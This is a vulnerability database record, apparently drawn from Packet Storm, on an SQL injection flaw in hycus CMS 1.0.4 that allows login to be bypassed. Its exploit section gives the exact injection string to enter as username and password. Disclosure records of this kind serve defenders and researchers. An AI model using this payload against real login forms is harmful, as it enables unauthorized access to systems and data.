ID

VAR-E-201806-0320


TITLE

hycus CMS 1.0.4 SQL Injection

Trust: 0.5

sources: PACKETSTORM: 148363

DESCRIPTION

hycus CMS version 1.0.4 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

Trust: 0.5

sources: PACKETSTORM: 148363

AFFECTED PRODUCTS

vendor:hycusmodel:cmsscope:eqversion:1.0.4

Trust: 0.5

sources: PACKETSTORM: 148363

EXPLOIT

# Exploit Title: hycus Content Management System v1.0.4 Login Page Bypass
# Google Dork:N/A
# Date: 28.06.2018
# Exploit Author: Berk Dusunur
# Vendor Homepage: http://www.hycus.com/
# Software Link: http://demosite.center/hycus/
# Version: 1.0.4
# Tested on: Pardus / Debian Web Server
# CVE : N/A

#Proof Of Concept

use login bypass payload for username= '=' 'OR' for password= '=' 'OR'

Trust: 0.5

sources: PACKETSTORM: 148363

EXPLOIT HASH

LOCAL

SOURCE

md5: 32e5893e02f3afa19fdaca23bbd75a9e
sha-1: c2acfd8176aa7144e94959e7e37ac59bf4f90d78
sha-256: 3890bb9f4e195bb91b26e724e6ca0c976e6a3796474aaa2a30288451bed835d7
md5: 32e5893e02f3afa19fdaca23bbd75a9e

Trust: 0.5

sources: PACKETSTORM: 148363

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 148363

TYPE

sql injection

Trust: 0.5

sources: PACKETSTORM: 148363

TAGS

tag:exploit

Trust: 0.5

tag:remote

Trust: 0.5

tag:sql injection

Trust: 0.5

sources: PACKETSTORM: 148363

CREDITS

Berk Dusunur

Trust: 0.5

sources: PACKETSTORM: 148363

EXTERNAL IDS

db:PACKETSTORMid:148363

Trust: 0.5

sources: PACKETSTORM: 148363

SOURCES

db:PACKETSTORMid:148363

LAST UPDATE DATE

2022-07-27T09:42:18.553000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:148363date:2018-06-28T13:33:33